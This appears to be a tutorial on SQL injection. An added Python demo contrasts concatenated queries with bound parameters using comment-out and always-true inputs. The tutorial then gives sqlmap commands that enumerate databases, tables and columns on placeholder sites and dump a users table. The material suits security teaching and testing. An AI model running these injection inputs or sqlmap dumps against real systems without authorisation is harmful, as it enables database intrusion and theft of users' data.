SQL Injection Using Sqlmap

SQL injection is an attack that poisons dynamic SQL statements, either by commenting out certain parts of the statement or by appending a condition that will always be true. It takes advantage of design flaws in poorly designed web applications to make their SQL statements execute malicious SQL code.
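The two cases described above (commenting out part of a statement, and appending an always-true condition), shown as an added example that is not part of the original post: a login lookup built by string concatenation next to the same lookup using bound parameters. The table, rows and function names are constructed for illustration and run against an in-memory SQLite database.

```python
import sqlite3


def make_db():
    """Build an in-memory database holding constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (name, password) VALUES (?, ?)",
        [("alice", "alice-pw"), ("bob", "bob-pw")],
    )
    return conn


def login_vulnerable(conn, name, password):
    """Dynamic SQL: the input becomes part of the statement text itself."""
    query = (
        "SELECT name FROM users WHERE name = '" + name
        + "' AND password = '" + password + "'"
    )
    return [row[0] for row in conn.execute(query)]


def login_parameterized(conn, name, password):
    """Bound parameters: the input is passed as data and never parsed as SQL."""
    query = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (name, password))]


if __name__ == "__main__":
    conn = make_db()
    cases = [
        ("legitimate login", "alice", "alice-pw"),
        # The "--" turns the password check into a SQL comment.
        ("comment-out input", "alice' --", "wrong"),
        # The OR clause makes the WHERE condition true for every row.
        ("always-true input", "nobody", "x' OR '1'='1"),
    ]
    for label, name, password in cases:
        print(label)
        print("  concatenated :", login_vulnerable(conn, name, password))
        print("  parameterized:", login_parameterized(conn, name, password))
```

With concatenation, both crafted inputs return rows without a valid password; with bound parameters they match nothing, because the quote characters stay inside the compared value.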

Sqlmap is one of the most popular and powerful SQL injection automation tools available. It can be used for multiple purposes, from confirming a SQL injection vulnerability to extracting the database name, tables, and columns and gaining full system access.

Installation

  • Your system should have Python installed, since sqlmap is a Python-based tool.
  • Download sqlmap by cloning the Git repository:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
  • Go to the sqlmap directory.
cd sqlmap-dev
  • To get a full list of the options available, run
python sqlmap.py -h

Important sqlmap Commands

  • Test GET parameters
python sqlmap.py -u 'http://mytestsite.com/page.php?id=5'
  • Test POST parameters
python sqlmap.py --data "param=val[&...]" -u "http://mytestsite.com/page"
  • Discover Databases
python sqlmap.py -u "http://mytestsite.com/section.php?id=51" --dbs
  • Find tables in a particular database
python sqlmap.py -u "http://mytestsite.com/section.php?id=51" --tables -D databasename
  • Get columns of a table
python sqlmap.py -u "http://mytestsite.com/section.php?id=51" --columns -D databasename -T users
  • Get data from a table
python sqlmap.py -u "http://www.mytestsite.com/section.php?id=51" --dump -D databasename -T users
